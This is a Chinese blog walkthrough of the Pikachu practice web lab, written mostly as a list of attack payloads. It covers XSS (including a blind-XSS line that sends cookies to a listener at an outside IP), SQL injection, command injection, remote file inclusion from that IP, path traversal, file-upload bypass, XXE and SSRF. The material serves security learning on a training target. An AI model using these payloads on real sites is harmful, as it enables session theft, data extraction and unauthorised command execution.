pikachu靶场通关

最新推荐文章于 2024-04-10 15:30:00 发布
最新推荐文章于 2024-04-10 15:30:00 发布
阅读量1k 收藏 1
点赞数
文章标签: 数据库 sql mysql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Yu3511606536/article/details/125938851
版权

Pikachu靶场

XSS

反射性

修改maxlength

<script>alert('XSS')</script>

反射性-POST

先登录

<script>alert('XSS')</script>

存储XSS

<script>alert('XSS')</script>

会将payload存在数据库中,每次点击这个功能都会触发这个xss

DOM型XSS

' onclick="alert(1)">

DOM型XSS-X

' onclick="alert(1)">

XSS盲打

在可以输入的地方全部输入payload

监听

python3 -m http.server 7777

输入

<script>location.href="http://49.234.56.200:7777/"+document.cookie</script>

点击右上角tips登录后台,触发payload,监听地址接收到请求

XSS过滤

大写绕过

<SCRIPT>alert(/1/)</SCRIPT>

XSS之htmlspecialchars

htmlspecialchars默认是不对单引号进行转义的

' οnclick='alert(1)'>

XSS之href输出

javascript:alert(1)

XSS之JS输出

会将输入值放到js源码中,闭合js语句,在页面中插入js语句

'</script><script>alert(1)</script>

SQL注入

数字型

id=1 union select 1,2&submit=%E6%9F%A5%E8%AF%A2

字符型

?name=kobe' union select 1,2--+&submit=%E6%9F%A5%E8%AF%A2

搜索型

?name=1' union select 1,2,3--+&submit=%E6%90%9C%E7%B4%A2

xx型注入

输入z’ sql语句报错

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''z'')' at line 1

闭合

?name=z') union select 1,2--+&submit=%E6%9F%A5%E8%AF%A2

insert/update注入

sex=girls&phonenum=18656565545' or extractvalue(0x0a,concat(0x0a,(select database()))) or '&add=usaxxxx&email=kobe%40pikachu.com&submit=submit

delete注入

?id=58+and+extractvalue(0x0a,concat(0x0a,(select+database())))

http header注入

' or extractvalue(0x0a,concat(0x0a,(select database()))) or '

布尔盲注

?name=lucy' and if(1>2,1,0)--+&submit=%E6%9F%A5%E8%AF%A2

时间盲注

?name=lili' and if(3>2,sleep(5),0)--+&submit=%E6%9F%A5%E8%AF%A2

宽字节注入

name=lucy%df%27 union select 1,2--+&submit=%E6%9F%A5%E8%AF%A2

RCE

exec ping

12 || whoami 两个都会执行
12 | whoami  第一个为假 执行第二个

127.0.0.1 && whoami 都会执行
127.0.0.1 && whoami 都会执行

12 && whoami 执行第一个
12 & whoami 两个都执行

exec eval

php代码执行

system('whoami');

File inclusion

本地文件包含

?filename=../../../a.txt&submit=%E6%8F%90%E4%BA%A4

远程文件包含

?filename=http://49.234.56.200/x.php?1=system('ls');&submit=%E6%8F%90%E4%BA%A4

Unsafe Filedownload

?filename=../../../index.php

Unsafe Fileupload

client check

客户端check

MIMI Type

Content-Type: image/jpeg

getimagesize

GIF89a
<?php phpinfo(); ?>

Ove Permission

水平越权

修改用户名可查看其他用户信息

?username=kobe&submit=点击查看个人信息

垂直越权

目录遍历

?title=../../../README.md

敏感信息泄露

源码泄露测试账号

 </div><!-- 测试账号:lili/123456-->

PHP反序列化

<?php
class S{
       public $test="<script>alert(1)</script>";
   }
   $s=new S(); //创建一个对象
   echo serialize($s);
?>

XXE

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE creds [<!ENTITY goodies SYSTEM "file:///proc/net/arp">]>
<user><username>&goodies;</username><password>testtest</password></user>

SSRF

curl

http://192.168.52.137/pikachu/vul/ssrf/ssrf_curl.php?url=http://www.baidu.com

file_get_content

http://192.168.52.137/pikachu/vul/ssrf/ssrf_fgc.php?file=file:///c:/windows/win.ini
L1nYuan
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pikachu靶场全部通关.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
pikachu靶场通关指南
weixin_43110519的博客
10-06 2179
pikachu靶场记录
pikachu 靶场通关(全)
最新发布
m0_59598029的博客
04-10 1229
发现同一个验证码我们重复使用了多次,返回的结果时用户名或密码错误,并没有提示验证码失效,也就是只要我们这个页面不刷新,就可以一直用这个验证码,那就跟第一关一样,直接ctrl+i拿去爆破,得到了跟上面一样的用户名跟密码。//union语句聚合两个查询的内容,由于页面只返回一行,所以在前面的输入一个不存在的id,我这里直接使-号,以返回我们输入的内容,这里页面上将1,2都返回了,得知两个字段都有回显,经过查找发现是在密码输入框的下方多一个隐藏的输入框,记录的是token的信息,那么直接拿去burp上开始爆破!
皮卡丘靶场通关1
qq_61109509的博客
03-09 6154
文章目录暴力破解基于表单的暴力破解暴力破解不安全的验证码on clienton servertoken 防爆破?这里借用大佬的wp 暴力破解 基于表单的暴力破解 点击Username,直接弹出个admin匹配此网站。我随便输了个123456,成功进入 后来我尝试爆破,用的是炸弹集。但是用户名和密码组合起来实在是太多了,爆出来不知道猴年马月。删删减减后保留了还是剩了很多 Sniper模式逻辑:先将第一个变量也就是用户名替换,第二个变量不动。当第一个变量替换完之后,对第二个变量进行依次替换。直白一点就是说
pikachu靶场通关教程
07-20
这个是刚开始学网络安全渗透的靶场练习心得,分享给大家
pikachu靶场环境
02-12
pikachu靶场环境
pikachu靶场网盘下载
04-01
pikachu是一个漏洞练习平台。其中包含了常见的web安全漏洞,如果你是一个渗透测试学习者没有靶场练手,那么pikachu将是一个不错的选择。
pikachu靶场通关详解
ekmgrwaetaetawt的博客
08-03 204
pikachu靶场通关详解——CSRF(POST)
pikachu靶场通关技巧详解
henghengzhao_的博客
10-13 6892
pikachu靶场全部漏洞详解,不懂可以留言,作者会及时回复
Pikachu靶场全级别通关教程详解
热门推荐
weixin_52385170的博客
12-02 3万+
Pikachu靶场通关教程,超详细,欢迎评论区留言,一起进步
Pikachu靶场通关秘籍(持续更新)
liu914589417的博客
10-17 4238
Pikachu靶场通关秘籍(持续更新)
pikachu靶场通关(上)
qq_65950075的博客
04-08 774
第一关:暴力破解1.1基于表单的暴力破解首先打开burp suite拦截,然后在随意输入账号密码,可在burpsuite上抓到皮卡丘的包,可以看到刚才输入的账号密码我们选择放包,然后看到提示“用户名或密码不存在”,说明刚刚随便输入的账号密码是错的(废话)这怎么办呢,可以看到右上角有提示,我们点开发现三个账号密码,其中肯定有一个是正确的,当然我们可以一个一个地试。但是数量多的话我们就不好试了。把这三个记下来,下面用到。再次随便输入账号密码,拦截抓包发送攻击类型选择集束炸弹。
皮卡丘靶场通关教程地址
qq_42955912的博客
03-12 1471
Pikachu靶场通关之暴力破解:https://mp.weixin.qq.com/s/A3f-7sP7je5DKQK_XEACJA Pikachu靶场通关之Cross-Site Scripting (XSS跨站脚本):https://mp.weixin.qq.com/s/WTjAYKUoP14Am0neaZFRVw Pikachu靶场通关SQL-Inject:https://mp.weixin.qq.com/s/Qm6VodtmNxQowsSt3cZZFw Pikachu靶场通关之Cross-si

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值